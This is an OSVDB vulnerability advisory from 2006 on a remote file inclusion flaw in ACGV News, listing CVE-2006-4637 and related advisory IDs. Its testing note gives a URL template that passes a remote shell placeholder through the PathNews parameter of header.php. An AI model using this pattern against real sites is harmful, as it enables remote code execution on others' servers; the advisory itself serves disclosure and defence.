ACGV News news.php PathNews Variable Remote File Inclusion

2006-09-07T10:26:26
ID OSVDB:30950
Type osvdb
Reporter OSVDB
Modified 2006-09-07T10:26:26

Description

Manual Testing Notes

http://[target]/ACGVnews/header.php?PathNews=[shell]

References:

Security Tracker: 1016816 Secunia Advisory ID:21765 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0114.html ISS X-Force ID: 28763 FrSIRT Advisory: ADV-2006-3475 CVE-2006-4637 Bugtraq ID: 19863